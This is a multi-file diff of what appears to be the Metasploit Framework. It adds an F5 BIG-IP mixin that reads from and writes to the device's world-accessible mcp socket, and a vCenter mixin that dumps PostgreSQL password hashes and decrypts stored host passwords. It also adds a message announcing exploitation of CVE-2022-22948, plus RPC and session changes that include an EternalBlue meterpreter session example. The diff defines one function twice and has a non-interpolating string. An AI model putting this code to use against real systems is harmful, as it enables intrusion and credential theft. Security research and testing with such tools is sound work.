+  class Post
+    module Linux
+      # This mixin lets you programmatically interact with F5's "mcp" service,
+      # which is a database service on a variety of F5's devices, including
+      # BIG-IP and BIG-IQ.
+      #
+      # mcp uses a UNIX domain socket @ /var/run/mcp for all communications.
+      # As of writing this module, it's world-accessible, so anybody can query
+      # or write to it. We implemented a few interesting things as modules, and
+      # your best bet for learning how to work this is to look at those modules,
+      # but this will document it briefly.
+      #
+      # Data is read and written by serializing a TLV-style structure and
+      # writing it to that socket, then parsing the response.
+      #
+      # If you're just reading data, you can use `mcp_simple_query()` to build
+      # a query that fetches everything under a given name, and get a Hash of
+      # data back. That's by far the easiest way to handle things.
+      #
+      # To create a more complex query, you'll need to use mcp_build(), which
+      # serializes a message. You can generate a single message, or an array of
+      # them. Then use mcp_send_recv() to write it/them to the socket.
+      # Additionally, mcp_send_recv() automatically parses them and returns
+      # a whole big nested array of data.
+      #
+      # To actually use that data without going crazy, I suggest using either
+      # mcp_get_single(tagname) to fetch a single tag, or
+      # mcp_get_multiple(tagname) if multiple of the same tag can be returned.
+      # Finally, the response from that can be passed to mcp_to_h() to convert
+      # the response to a hash (note that if there are multiple of the same tag,
+      # map_to_h() will only keep one of them).
+      #
+      # Obviously, this is all way more complex than mcp_simple_query(). You can
+      # see this in action in the module `linux/local/f5_create_user`.
+      module F5Mcp # rubocop:disable Metrics/ModuleLength
+        def initialize(info = {})
+          file = ::File.join(Msf::Config.data_directory, 'f5-mcp-objects.txt')
+          objects = ::File.read(file)
+
+          raise("Could not load #{file}!") unless objects
+
+          @tags_by_id =
+            objects
+            .split(/\n/)
+            .reject { |o| o.start_with?('#') }
+            .map(&:strip)
+            .map do |o|
+              value, tag = o.split(/ /, 2)
+
+              raise("Invalid line in #{file}: #{o}") if tag.nil?
+
+              [value.to_i(16), tag]
+            end
+            .to_h
+            .freeze
+
+          @tags_by_name = @tags_by_id.invert.freeze
+
+          super(info)
+        end
+
+        # Parse one or more packets (including headers) into an array of
+        # packets.
+        def mcp_parse_responses(incoming_data)
+          replies = []
+
+          while incoming_data.length > 16
+            # Grab the length and remove the header from the incoming data
+            expected_length, _, incoming_data = incoming_data.unpack('Na12a*')
+
+            # Read the packet
+            packet, incoming_data = incoming_data.unpack("a#{expected_length}a*")
+
+            # Sanity check
+            if packet.length != expected_length
+              print_warning('mcp message is truncated!')
+              return replies
+            end
+
+            # Parse it
+            replies << mcp_parse(packet)
+          end
+
+          return replies
+        end
+
+        def mcp_send_recv(messages)
+          # Attach headers to each message and combine them
+          message = messages.map do |m|
+            [m.length, 0, 0, 0, m].pack('NNNNa*')
+          end.join('')
+
+          # Encode as base64 so we can pass it on the commandline
+          message = Rex::Text.encode_base64(message)
+
+          # Sometimes, the service doesn't respond with a complete packet, but
+          # instead truncates it. This only seems to happen on very long replies,
+          # and seems to happen ~50% of the time, so running this loop 5 times
+          # gives a pretty high chance of it working
+          #
+          # This isn't a problem with Metasploit, it even happens when I use
+          # socat directly.. I think it's just because we don't have AF_UNIX.
+          # In this example, 559604 is right and 548160 is truncated:
+          #
+          # # echo 'AAAAEAAAAAAAAAAAAAAAAAtlAA0AAAAICEoADQAAAAA=' | base64 -d | socat -t100 - UNIX-CONNECT:/var/run/mcp | wc -c
+          # 559604
+          # # echo 'AAAAEAAAAAAAAAAAAAAAAAtlAA0AAAAICEoADQAAAAA=' | base64 -d | socat -t100 - UNIX-CONNECT:/var/run/mcp | wc -c
+          # 548160
+          #
+          # This loop is the best we can do without having access to an AF_UNIX
+          # socket (or doing something much, much more complex)
+          0.upto(4) do
+            # Send the request messages(s) to the socket
+            incoming_data = cmd_exec("echo '#{message}' | base64 -d | socat -t100 - UNIX-CONNECT:/var/run/mcp")
+
+            # Fail if we got no response or no header
+            if !incoming_data || incoming_data.length < 16
+              print_error('Request to /var/run/mcp socket failed')
+              return nil
+            end
+
+            # Get the expected length and make sure the full response is at least
+            # that long
+            expected_length = incoming_data.unpack('N').pop
+            if incoming_data.length < expected_length
+              vprint_warning("mcp responded with #{incoming_data.length} bytes instead of the promised #{expected_length} bytes! Trying again...")
+            else
+              return mcp_parse_responses(incoming_data)
+            end
+          end
+
+          print_error("mcp isn't responding with a full message, giving up")
+          nil
+        end
+
+        # Recursively parse an mcp message from a binary stream into an object
+        #
+        # Adapted from https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-parser.rb
+        def mcp_parse(stream)
+          # Reminder: this has to be an array, not a hash, because there are
+          # often duplicate entries (like multiple userdb_entry results when a
+          # query is performed).
+          result = []
+
+          # Make a Hash of parsers. Some of them are recursive, which is fun!
+          #
+          # They all take the stream as an input argument, and return
+          # [value, stream]
+          parsers = {
+            # The easy stuff - simple values
+            'ulong' => proc { |s| s.unpack('Na*') },
+            'long' => proc { |s| s.unpack('Na*') },
+            'uquad' => proc { |s| s.unpack('Q>a*') },
+            'uword' => proc { |s| s.unpack('na*') },
+            'byte' => proc { |s| s.unpack('Ca*') },
+            'service' => proc { |s| s.unpack('na*') },
+
+            # Parse 'time' as a time
+            'time' => proc do |s|
+              value, s = s.unpack('Na*')
+              [Time.at(value), s]
+            end,
+
+            # Look up 'tag' values
+            'tag' => proc do |s|
+              value, s = s.unpack('na*')
+              [@tags_by_id[value], s]
+            end,
+
+            # Parse MAC addresses
+            'mac' => proc do |s|
+              value, s = s.unpack('a6a*')
+              [value.bytes.map { |b| '%02x'.format(b) }.join(':'), s]
+            end,
+
+            # 'string' is prefixed by two length values
+            'string' => proc do |s|
+              length, otherlength, s = s.unpack('Nna*')
+
+              # I'm sure the two length values have a semantic difference, but just check for sanity
+              if otherlength + 2 != length
+                raise "Inconsistent string lengths: #{length} + #{otherlength}"
+              end
+
+              s.unpack("a#{otherlength}a*")
+            end,
+
+            # 'structure' is recursive
+            'structure' => proc do |s|
+              length, s = s.unpack('Na*')
+              struct, s = s.unpack("a#{length}a*")
+
+              [mcp_parse(struct), s]
+            end,
+
+            # 'array' is a bunch of consecutive values of the same type, which
+            # means we need to index back into this same parser array
+            'array' => proc do |s|
+              length, s = s.unpack('Na*')
+              array, s = s.unpack("a#{length}a*")
+
+              type, elements, array = array.unpack('nNa*')
+              type = @tags_by_id[type] || '<unknown type 0x%04x>'.format(type)
+
+              array_results = []
+              elements.times do
+                array_result, array = parsers[type].call(array)
+                array_results << array_result
+              end
+
+              [array_results, s]
+            end
+          }
+
+          begin
+            while stream.length > 2
+              tag, type, stream = stream.unpack('nna*')
+
+              tag = @tags_by_id[tag] || '<unknown tag 0x%04x>'.format(tag)
+              type = @tags_by_id[type] || '<unknown type 0x%04x>'.format(type)
+
+              if parsers[type]
+                value, stream = parsers[type].call(stream)
+                result << {
+                  tag: tag,
+                  value: value
+                }
+              else
+                raise "Tried to parse unknown mcp type (skipping): type = #{type}, tag = #{tag}"
+              end
+            end
+          rescue StandardError => e
+            # If we fail somewhere, print a warning but return what we have
+            print_warning("Parsing mcp data failed: #{e.message}")
+          end
+
+          result
+        end
+
+        # Pull a single value out of a tag/value structure (ie, the thing
+        # returned by mcp_parse()). The result is:
+        #
+        # * If there are no values with that tag name, return nil
+        # * If there's a single value with that tag name, return it
+        # * If there are multiple values with that tag name, print an error
+        #   and return nil
+        def mcp_get_single(hash, name)
+          # Get all the entries
+          entries = mcp_get_multiple(hash, name)
+
+          if entries.empty?
+            # If there are none, return nil
+            return nil
+          elsif entries.length == 1
+            # If there's one, return it
+            return entries.pop
+          else
+            # If there are multiple entries, print a warning and return nil
+            print_error("Query for mcp type #{name} was supposed to have one response but had #{entries.length}")
+            return nil
+          end
+        end
+
+        # Pull an array of tags with the same name out of a tag/value structure.
+        # For example, when you perform a query for `userdb_entry`, it returns
+        # multiple tags with the same name.
+        #
+        # The result is:
+        # * If there are no values, return an empty array
+        # * If there are one or more values, return them as an array
+        def mcp_get_multiple(hash, name)
+          hash.select { |entry| entry[:tag] == name }.map { |entry| entry[:value] }
+        end
+
+        # Take an array of results from an mcp query, and change them from
+        # an array of tag=>value into a hash.
+        #
+        # Note! If there are multiple fields with the same tag, this will
+        # only return one of them!
+        def mcp_to_h(array)
+          array.map do |r|
+            [r[:tag], r[:value]]
+          end.to_h
+        end
+
+        # Build an mcp message
+        #
+        # Adapted from https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-builder.rb
+        def mcp_build(tag, type, data)
+          if @tags_by_name[tag].nil?
+            raise "Invalid mcp tag: #{tag}"
+          end
+          if @tags_by_name[type].nil?
+            raise "Invalid mcp type: #{type}"
+          end
+
+          out = ''
+          if type == 'structure'
+            out = [data.join.length, data.join].pack('Na*')
+          elsif type == 'string'
+            out = [data.length + 2, data.length, data].pack('Nna*')
+          elsif type == 'uquad'
+            out = [data].pack('Q>')
+          elsif type == 'ulong'
+            out = [data].pack('N')
+          elsif type == 'uword'
+            out = [data].pack('n')
+          elsif type == 'long'
+            out = [data].pack('N')
+          elsif type == 'tag'
+            out = [@tags_by_name[data]].pack('n')
+          elsif type == 'byte'
+            out = [data].pack('C')
+          elsif type == 'mac'
+            out = [data].pack('a6')
+          else
+            raise "Unknown type: #{type}"
+          end
+
+          out = [@tags_by_name[tag], @tags_by_name[type], out].pack('nna*')
+
+          return out
+        end
+
+        # Do a query_all request for something that will reply with a single
+        # query result.
+        #
+        # Attempts to abstract away all the messiness in the protocol, instead
+        # we just query for a type and get all the responses as an array of
+        # hashes
+        def mcp_simple_query(querytype)
+          # Get the raw result
+          result = mcp_send_recv([
+            mcp_build('query_all', 'structure', [
+              mcp_build(querytype, 'structure', [])
+            ])
+          ])
+
+          # Error handling
+          unless result
+            print_error('mcp_send_recv failed')
+            return nil
+          end
+
+          # Sanity check - we only expect one result
+          if result.length != 1
+            print_error("mcp_send_recv query was supposed to return one result, but returned #{result.length} results instead")
+            return nil
+          end
+          # Get that result
+          result = result.pop
+
+          # Get the reply
+          result = mcp_get_single(result, 'query_reply')
+          if result.nil?
+            print_error("mcp didn't return a query_reply to our query")
+            return nil
+          end
+
+          # Get all the fields for the querytype
+          result = mcp_get_multiple(result, querytype)
+
+          # Convert each result to a hash
+          result = result.map do |single_result|
+            mcp_to_h(single_result)
+          end
+
+          result
+        end
+      end
+    end
+  end
+end
@@ -0,0 +1,308 @@
+# -*- coding: binary -*-
+
+module Msf
+  class Post
+    module Vcenter
+      module Database
+        include Msf::Post::File
+
+        def pgpass_file
+          '/root/.pgpass'
+        end
+
+        def psql_bin
+          '/opt/vmware/vpostgres/current/bin/psql'
+        end
+
+        #
+        # Returns a array of hashes of the .pgpass file
+        # @param location [String] where the file is located. defaults to /root/.pgpass
+        # @return [Array] array of hashes of the file contents, nil on error
+        #
+        def process_pgpass_file(location = pgpass_file)
+          return nil unless file_exist?(location)
+
+          contents = read_file(location)
+          return nil if contents.nil?
+          return nil if contents.empty?
+
+          output = []
+          contents.each_line(chomp: true) do |line|
+            # file format hostname:port:database:username:password
+            # https://www.postgresql.org/docs/current/libpq-pgpass.html
+            next unless line.include?(':') # attempt to do a little quality control
+
+            sections = line.split(':')
+            o = {}
+            o['hostname'] = sections[0].strip
+            o['port'] = sections[1].strip
+            o['database'] = sections[2]
+            o['username'] = sections[3]
+            o['password'] = sections[4]
+
+            o['port'] = '5432' if o['port'] == '*'
+            output.append(o)
+          end
+          output
+        end
+
+        #
+        # Returns a list of postgres users and password hashes from the database
+        # @param pg_password [String] postgress password
+        # @param vcdb_user [String] virtual center database username
+        # @param vcdb_name [String] virtual center database name
+        # @return [Array] list of hash tables where each table is a user, nil on error
+        #
+        def query_pg_shadow_values(pg_password, vcdb_user, vcdb_name)
+          return nil unless command_exists? psql_bin
+
+          output = []
+          postgres_users = cmd_exec("#{postgress_connect(pg_password, vcdb_user, vcdb_name)} -c 'SELECT usename, passwd FROM pg_shadow;' -P pager -A -t")
+          return nil if postgres_users.nil?
+
+          postgres_users = postgres_users.split("\n")
+          return nil unless postgres_users.first
+
+          postgres_users.each do |postgres_user|
+            row_data = postgres_user.split('|')
+            next if row_data.length < 2 # shoudld always be 2 based on query, but this will catch 'command not found' or other things like that
+
+            user = {
+              'user' => row_data[0],
+              'password_hash' => row_data[1]
+            }
+
+            output.append(user)
+          end
+          output
+        end
+
+        #
+        # Returns a list of postgres users and password hashes from the database
+        # @param pg_password [String] postgress password
+        # @param vcdb_user [String] virtual center database username
+        # @param vcdb_name [String] virtual center database name
+        # @return [Array] list of hash tables where each table is a user, nil on error
+        #
+        def query_pg_shadow_values(pg_password, vcdb_user, vcdb_name)
+          return nil unless command_exists? psql_bin
+
+          output = []
+          postgres_users = cmd_exec("#{postgress_connect(pg_password, vcdb_user, vcdb_name)} -c 'SELECT usename, passwd FROM pg_shadow;' -P pager -A -t")
+          return nil if postgres_users.nil?
+
+          postgres_users = postgres_users.split("\n")
+          return nil unless postgres_users.first
+
+          postgres_users.each do |postgres_user|
+            row_data = postgres_user.split('|')
+            next if row_data.length < 2 # shoudld always be 2 based on query, but this will catch 'command not found' or other things like that
+
+            user = {
+              'user' => row_data[0],
+              'password_hash' => row_data[1]
+            }
+
+            output.append(user)
+          end
+          output
+        end
+
+        #
+        # Returns a list of vpx users and password hashes from the database
+        # @param pg_password [String] postgress password
+        # @param vcdb_user [String] virtual center database username
+        # @param vcdb_name [String] virtual center database name
+        # @param symkey [String] string of they symkey
+        # @return [Array] list of hash tables where each table is a user, nil on error
+        #
+        def query_vpx_creds(pg_password, vcdb_user, vcdb_name, symkey = nil)
+          return nil unless command_exists? psql_bin
+
+          output = []
+          vpx_creds = cmd_exec("#{postgress_connect(pg_password, vcdb_user, vcdb_name)} -c 'SELECT user_name, password, local_ip_address, ip_address, dns_name FROM VPX_HOST;' -P pager -A -t")
+          return nil if vpx_creds.nil?
+
+          vpx_creds = vpx_creds.split("\n")
+          return nil unless vpx_creds.first
+
+          vpx_creds.each do |vpx_user|
+            row_data = vpx_user.split('|')
+            next if row_data.length < 2 # shoudld always be 2 based on query, but this will catch 'command not found' or other things like that
+
+            user = {
+              'user' => row_data[0],
+              'encrypted_password' => row_data[1],
+              'local_ip' => row_data[2],
+              'ip_address' => row_data[3],
+              'dns_name' => row_data[4]
+            }
+            unless symkey.nil?
+              # https://github.com/shmilylty/vhost_password_decrypt/blob/main/decrypt.py
+              # https://pentera.io/blog/information-disclosure-in-vmware-vcenter/
+              encrypted_password = row_data[1].gsub('*', '').strip
+              encrypted_password = Base64.decode64(encrypted_password)
+              encrypted_password = encrypted_password.scan(/.{16}/)
+
+              iv = encrypted_password.shift
+              encrypted_password = encrypted_password.join
+              begin
+                cipher = OpenSSL::Cipher.new('aes-256-cbc')
+                cipher.decrypt
+                cipher.key = [symkey.strip].pack('H*')
+                cipher.iv = iv
+                user['decrypted_password'] = cipher.update(encrypted_password) + cipher.final
+              rescue OpenSSL::Cipher::CipherError => e
+                vprint_error("Unable to decrypt password for #{user} due to OpenSSL Cipher Error: #{e}")
+              end
+            end
+
+            output.append(user)
+          end
+          output
+        end
+
+        #
+        # A helper function to return the command line statement string to connect to the postgress server
+        # @param pg_password [String] postgress password
+        # @param vcdb_user [String] virtual center database username
+        # @param vcdb_name [String] virtual center database name
+        # @param vcdb_host [String] virtual center hostname. Defaults to 'localhost'
+        # @return [String] a string to run on command line
+        #
+        def postgress_connect(pg_password, vcdb_user, vcdb_name, vcdb_host = 'localhost')
+          # should come in wrapped in quotes, but if not wrap
+          unless pg_password.start_with?("'") && pg_password.end_with?("'")
+            pg_password = "'#{pg_password}'"
+          end
+          "PGPASSWORD=#{pg_password} #{psql_bin} -h '#{vcdb_host}' -U '#{vcdb_user}' -d '#{vcdb_name}'"
+        end
+
+        #
+        # Returns a list of vpc customization contents
+        # @param pg_password [String] postgress password
+        # @param vcdb_user [String] virtual center database username
+        # @param vcdb_name [String] virtual center database name
+        # @return [Hash] where the customization name is the key and value is the parsed xml doc, nil on error
+        #
+        def get_vpx_customization_spec(pg_password, vcdb_user, vcdb_name)
+          return nil unless command_exists? psql_bin
+
+          output = {}
+          vpx_customization_specs = cmd_exec("#{postgress_connect(pg_password, vcdb_user, vcdb_name)} -c 'SELECT DISTINCT name FROM vc.vpx_customization_spec;' -P pager -A -t")
+          return nil if vpx_customization_specs.nil?
+
+          vpx_customization_specs = vpx_customization_specs.split("\n")
+          return nil unless vpx_customization_specs.first
+
+          vpx_customization_specs.each do |spec|
+            xml = cmd_exec("#{postgress_connect(pg_password, vcdb_user, vcdb_name)} -c \"SELECT body FROM vpx_customization_spec WHERE name = '#{spec}\';\" -P pager -A -t").to_s.strip.gsub("\r\n", '').gsub("\n", '').gsub(/>\s*/, '>').gsub(/\s*</, '<')
+            next if xml.nil?
+
+            begin
+              xmldoc = Nokogiri::XML(xml) do |config|
+                config.options = Nokogiri::XML::ParseOptions::STRICT | Nokogiri::XML::ParseOptions::NONET
+              end
+            rescue Nokogiri::XML::SyntaxError
+              print_bad("Unable to read XML from #{spec}")
+              next
+            end
+            output[spec] = xmldoc
+          end
+          output
+        end
+
+        #
+        # Returns a list of virtual machines located on the server
+        # @param pg_password [String] postgress password
+        # @param vcdb_user [String] virtual center database username
+        # @param vcdb_name [String] virtual center database name
+        # @param vc_sym_key [String] sym key from virtual center
+        # @return [Array] list of hash tables where each table is a user, nil on error
+        #
+        def get_vpx_vms(pg_password, vcdb_user, vcdb_name, _vc_sym_key)
+          return nil unless command_exists? psql_bin
+
+          output = []
+          vm_rows = cmd_exec("#{postgress_connect(pg_password, vcdb_user, vcdb_name)} -c 'SELECT vmid, name, configfilename, guest_state, is_template FROM vpxv_vms;' -P pager -A -t")
+          return nil if vm_rows.nil?
+
+          vm_rows = vm_rows.split("\n")
+          return nil unless vm_rows.first
+
+          vm_rows.each do |vm_row|
+            row_data = vm_row.split('|')
+            next if row_data.length < 5 # shoudld always be 5 based on query, but this will catch 'command not found' or other things like that
+
+            vm = {
+              'vmid' => row_data[0],
+              'name' => row_data[1],
+              'configfilename' => row_data[3],
+              'guest_state' => row_data[4],
+              'is_template' => row_data[5]
+            }
+            output.append(vm)
+          end
+          output
+        end
+
+        #
+        # Returns a list of vpc customization contents
+        # @param pg_password [String] postgress password
+        # @param vcdb_user [String] virtual center database username
+        # @param vcdb_name [String] virtual center database name
+        # @param vc_sym_key [String] sym key from virtual center
+        # @return [Array] list of hash tables where each table is a user, nil on error
+        #
+        def get_vpx_users(pg_password, vcdb_user, vcdb_name, vc_sym_key)
+          return nil unless command_exists? psql_bin
+
+          output = []
+          vpxuser_rows = cmd_exec("#{postgress_connect(pg_password, vcdb_user, vcdb_name)} -c 'SELECT dns_name, ip_address, user_name, password FROM vc.vpx_host ORDER BY dns_name ASC;' -P pager -A -t")
+          return nil if vpxuser_rows.nil?
+
+          vpxuser_rows = vpxuser_rows.split("\n")
+          return nil unless vpxuser_rows.first
+
+          vpxuser_rows.each do |vpxuser_row|
+            row_data = vpxuser_row.split('|')
+            next if row_data.length < 4 # shoudld always be 4 based on query, but this will catch 'command not found' or other things like that
+
+            user = {
+              'fqdn' => row_data[0],
+              'ip' => row_data[1],
+              'user' => row_data[2]
+            }
+
+            vpxuser_secret_b64 = row_data[3].gsub('*', '')
+            user['password'] = vpx_aes_decrypt(vpxuser_secret_b64, vc_sym_key).gsub('\"', '"')
+            output.append(user)
+          end
+          output
+        end
+
+        #
+        # helper function to decrypt passwords stored in the pg database
+        # @param b64 [String] base64 string of the password exported from postgres
+        # @param vc_sym_key [String] sym key from virtual center
+        # @return [String] the decrypted password, nil on error
+
+        def vpx_aes_decrypt(b64, vc_sym_key)
+          # https://www.pentera.io/wp-content/uploads/2022/03/Sensitive-Information-Disclosure_VMware-vCenter_f.pdf
+          secret_bytes = Base64.strict_decode64(b64)
+          iv = secret_bytes[0, 16]
+          ciphertext = secret_bytes[16, 64]
+          decipher = OpenSSL::Cipher.new('aes-256-cbc')
+          decipher.decrypt
+          decipher.iv = iv
+          decipher.padding = 1
+          decipher.key = vc_sym_key
+          return (decipher.update(ciphertext) + decipher.final).delete("\000")
+        rescue StandardError => e
+          elog('Error performing vpx_aes_decrypt', error: e)
+          ''
+        end
+      end
+    end
+  end
+end
@@ -5,6 +5,7 @@ module Msf
    module Vcenter
      module Vcenter
        include Msf::Post::File
+        include Msf::Post::Linux::Priv

        def manifest_file
          '/opt/vmware/etc/appliance-manifest.xml'
@@ -46,6 +47,10 @@ module Msf
          '/opt/vmware/vpostgres/current/bin/psql'
        end

+        def vcd_properties_file
+          '/etc/vmware-vpx/vcdb.properties'
+        end
+
        #
        # Function to determine if a string is a valid FQDN or not
        # @param fqdn [String] the string to check if it is a valid FQDN or not
@@ -348,160 +353,22 @@ module Msf
          nil
        end

-        #
-        # A helper function to return the command line statement string to connect to the postgress server
-        # @param pg_password [String] postgress password
-        # @param vcdb_user [String] virtual center database username
-        # @param vcdb_name [String] virtual center database name
-        # @param vcdb_host [String] virtual center hostname. Defaults to 'localhost'
-        # @return [String] a string to run on command line
-        #
-        def postgress_connect(pg_password, vcdb_user, vcdb_name, vcdb_host = 'localhost')
-          # should come in wrapped in quotes, but if not wrap
-          unless pg_password.start_with?("'") && pg_password.end_with?("'")
-            pg_password = "'#{pg_password}'"
-          end
-          "PGPASSWORD=#{pg_password} #{psql_bin} -h '#{vcdb_host}' -U '#{vcdb_user}' -d '#{vcdb_name}'"
-        end
-
-        #
-        # Returns a list of vpc customization contents
-        # @param pg_password [String] postgress password
-        # @param vcdb_user [String] virtual center database username
-        # @param vcdb_name [String] virtual center database name
-        # @return [Hash] where the customization name is the key and value is the parsed xml doc, nil on error
-        #
-        def get_vpx_customization_spec(pg_password, vcdb_user, vcdb_name)
-          return nil unless command_exists? psql_bin
-
-          output = {}
-          vpx_customization_specs = cmd_exec("#{postgress_connect(pg_password, vcdb_user, vcdb_name)} -c 'SELECT DISTINCT name FROM vc.vpx_customization_spec;' -P pager -A -t")
-          return nil if vpx_customization_specs.nil?
-
-          vpx_customization_specs = vpx_customization_specs.split("\n")
-          return nil unless vpx_customization_specs.first
-
-          vpx_customization_specs.each do |spec|
-            xml = cmd_exec("#{postgress_connect(pg_password, vcdb_user, vcdb_name)} -c \"SELECT body FROM vpx_customization_spec WHERE name = '#{spec}\';\" -P pager -A -t").to_s.strip.gsub("\r\n", '').gsub("\n", '').gsub(/>\s*/, '>').gsub(/\s*</, '<')
-            next if xml.nil?
-
-            begin
-              xmldoc = Nokogiri::XML(xml) do |config|
-                config.options = Nokogiri::XML::ParseOptions::STRICT | Nokogiri::XML::ParseOptions::NONET
-              end
-            rescue Nokogiri::XML::SyntaxError
-              print_bad("Unable to read XML from #{spec}")
-              next
-            end
-            output[spec] = xmldoc
-          end
-          output
-        end
-
-        #
-        # helper function to decrypt passwords stored in the pg database
-        # @param b64 [String] base64 string of the password exported from postgres
-        # @param vc_sym_key [String] sym key from virtual center
-        # @return [String] the decrypted password, nil on error
-
-        def vpx_aes_decrypt(b64, vc_sym_key)
-          # https://www.pentera.io/wp-content/uploads/2022/03/Sensitive-Information-Disclosure_VMware-vCenter_f.pdf
-          secret_bytes = Base64.strict_decode64(b64)
-          iv = secret_bytes[0, 16]
-          ciphertext = secret_bytes[16, 64]
-          decipher = OpenSSL::Cipher.new('aes-256-cbc')
-          decipher.decrypt
-          decipher.iv = iv
-          decipher.padding = 1
-          decipher.key = vc_sym_key
-          return (decipher.update(ciphertext) + decipher.final).delete("\000")
-        rescue StandardError => e
-          elog('Error performing vpx_aes_decrypt', error: e)
-          ''
-        end
-
-        #
-        # Returns a list of vpc customization contents
-        # @param pg_password [String] postgress password
-        # @param vcdb_user [String] virtual center database username
-        # @param vcdb_name [String] virtual center database name
-        # @param vc_sym_key [String] sym key from virtual center
-        # @return [Array] list of hash tables where each table is a user, nil on error
-        #
-        def get_vpx_users(pg_password, vcdb_user, vcdb_name, vc_sym_key)
-          return nil unless command_exists? psql_bin
-
-          output = []
-          vpxuser_rows = cmd_exec("#{postgress_connect(pg_password, vcdb_user, vcdb_name)} -c 'SELECT dns_name, ip_address, user_name, password FROM vc.vpx_host ORDER BY dns_name ASC;' -P pager -A -t")
-          return nil if vpxuser_rows.nil?
-
-          vpxuser_rows = vpxuser_rows.split("\n")
-          return nil unless vpxuser_rows.first
-
-          vpxuser_rows.each do |vpxuser_row|
-            row_data = vpxuser_row.split('|')
-            next if row_data.length < 4 # shoudld always be 4 based on query, but this will catch 'command not found' or other things like that
-
-            user = {
-              'fqdn' => row_data[0],
-              'ip' => row_data[1],
-              'user' => row_data[2]
-            }
-
-            vpxuser_secret_b64 = row_data[3].gsub('*', '')
-            user['password'] = vpx_aes_decrypt(vpxuser_secret_b64, vc_sym_key).gsub('\"', '"')
-            output.append(user)
-          end
-          output
-        end
-
-        #
-        # Returns a list of virtual machines located on the server
-        # @param pg_password [String] postgress password
-        # @param vcdb_user [String] virtual center database username
-        # @param vcdb_name [String] virtual center database name
-        # @param vc_sym_key [String] sym key from virtual center
-        # @return [Array] list of hash tables where each table is a user, nil on error
-        #
-        def get_vpx_vms(pg_password, vcdb_user, vcdb_name, _vc_sym_key)
-          return nil unless command_exists? psql_bin
-
-          output = []
-          vm_rows = cmd_exec("#{postgress_connect(pg_password, vcdb_user, vcdb_name)} -c 'SELECT vmid, name, configfilename, guest_state, is_template FROM vpxv_vms;' -P pager -A -t")
-          return nil if vm_rows.nil?
-
-          vm_rows = vm_rows.split("\n")
-          return nil unless vm_rows.first
-
-          vm_rows.each do |vm_row|
-            row_data = vm_row.split('|')
-            next if row_data.length < 5 # shoudld always be 5 based on query, but this will catch 'command not found' or other things like that
-
-            vm = {
-              'vmid' => row_data[0],
-              'name' => row_data[1],
-              'configfilename' => row_data[3],
-              'guest_state' => row_data[4],
-              'is_template' => row_data[5]
-            }
-            output.append(vm)
-          end
-          output
-        end
-
        #
        # Returns a hash table of the vcdb.properties file
        # @param location [String] where the file is located. defaults to /etc/vmware-vpx/vcdb.properties
        # @return [Hash] hash of the file contents, nil on error
        #
-        def process_vcdb_properties_file(location = '/etc/vmware-vpx/vcdb.properties')
+        def process_vcdb_properties_file(location = vcd_properties_file)
          return nil unless file_exist?(location)

          contents = read_file(location)
          return nil if contents.nil?

+          if location == vcd_properties_file && is_root? == false
+            print_good('Exploited CVE-2022-22948 to read #{vcd_properties_file}')
+          end
          output = {}
-          contents.split("\n").each do |line|
+          contents.each_line(chomp: true) do |line|
            next unless line.include?('=') # attempt to do a little quality control

            line = line.split('=')
@@ -40,6 +40,11 @@ module FileInfo
      nil
    )['return']

+    if file_version_info_size == 0
+      # Indicates an error - should not continue
+      return nil
+    end
+
    buffer = session.railgun.kernel32.VirtualAlloc(
      nil,
      file_version_info_size,
@@ -151,6 +151,8 @@ module Msf
              results << datastore.merge(overrides)
            end
          end
+        rescue ::Interrupt
+          raise
        rescue StandardError => e
          results << Msf::RhostsWalker::Error.new(value, cause: e)
        end
@@ -467,7 +467,6 @@ class RPC_Module < RPC_Base
    res
  end

-
  # Executes a module.
  #
  # @param [String] mtype Module type. Supported types include (case-sensitive):
@@ -738,6 +737,12 @@ private
  end

  def _run_exploit(mod, opts)
+    if mod.datastore['PAYLOAD']
+      opts['PAYLOAD'] = mod.datastore['PAYLOAD']
+    else
+      opts['PAYLOAD'] = Msf::Payload.choose_payload(mod)
+    end
+
    s = Msf::Simple::Exploit.exploit_simple(mod, {
      'Payload'  => opts['PAYLOAD'],
      'Target'   => opts['TARGET'],
@@ -846,4 +851,3 @@ private
 end
 end
 end
-
@@ -56,12 +56,35 @@ class RPC_Session < RPC_Base
  end


-  # Stops a session.
+  # Stops a session - alias for killing a session in `msfconsole`
  #
  # @param [Integer] sid Session ID.
  # @raise [Msf::RPC::Exception] Unknown session ID.
  # @return [Hash] A hash indicating the action was successful. It contains the following key:
  #  * 'result' [String] A message that says 'success'.
+  # @example Here's how you would use this from the client:
+  #  # You have an active session, you run session list to view the session number, then pass that session number to the `stop` command:
+  # >> rpc.call('session.list')
+  #  {7=>
+  #   {"type"=>"meterpreter",
+  #    "tunnel_local"=>"192.168.xxx.xxx:4444",
+  #    "tunnel_peer"=>"192.168.xxx.xxx:64688",
+  #    "via_exploit"=>"exploit/windows/smb/ms17_010_eternalblue",
+  #    "via_payload"=>"payload/windows/x64/meterpreter/reverse_tcp",
+  #    "desc"=>"Meterpreter",
+  #    "info"=>"NT AUTHORITY\\SYSTEM @ DC1",
+  #    "workspace"=>"default",
+  #    "session_host"=>"192.168.xxx.xxx",
+  #    "session_port"=>445,
+  #    "target_host"=>"192.168.xxx.xxx",
+  #    "username"=>"foo",
+  #    "uuid"=>"h9pbmuoh",
+  #    "exploit_uuid"=>"tcjj1fqo",
+  #    "routes"=>"",
+  #    "arch"=>"x86",
+  #    "platform"=>"windows"}}
+  # >> rpc.call('session.stop', 7)
+  # => {"result"=>"success"}
  def rpc_stop( sid)

    s = self.framework.sessions[sid.to_i]
@@ -487,4 +510,3 @@ private
 end
 end
 end
-
@@ -137,7 +137,12 @@ module SingleCommandShell

    # Send the command to the session's stdin.
    delimiter = "echo #{token}"
-    shell_data = cmd + "#{command_separator}#{delimiter}#{command_termination}"
+    if cmd.strip.end_with?(command_separator)
+      # This command already ends with a delimiter - don't need to add another one
+      shell_data = cmd + "#{delimiter}#{command_termination}"
+    else
+      shell_data = cmd + "#{command_separator}#{delimiter}#{command_termination}"
+    end
    unless @is_echo_shell
      shell_data = "#{delimiter}#{command_separator}#{shell_data}"
    end
@@ -452,7 +452,12 @@ class Creds

      unless tbl.nil?
        public_val = core.public ? core.public.username : ''
-        private_val = core.private ? core.private.to_s : ''
+        if core.private
+          # Show the human readable description by default, unless the user ran with `--verbose` and wants to see the cred data
+          private_val = truncate ? core.private.to_s : core.private.data
+        else
+          private_val = ''
+        end
        if truncate && private_val.to_s.length > 87
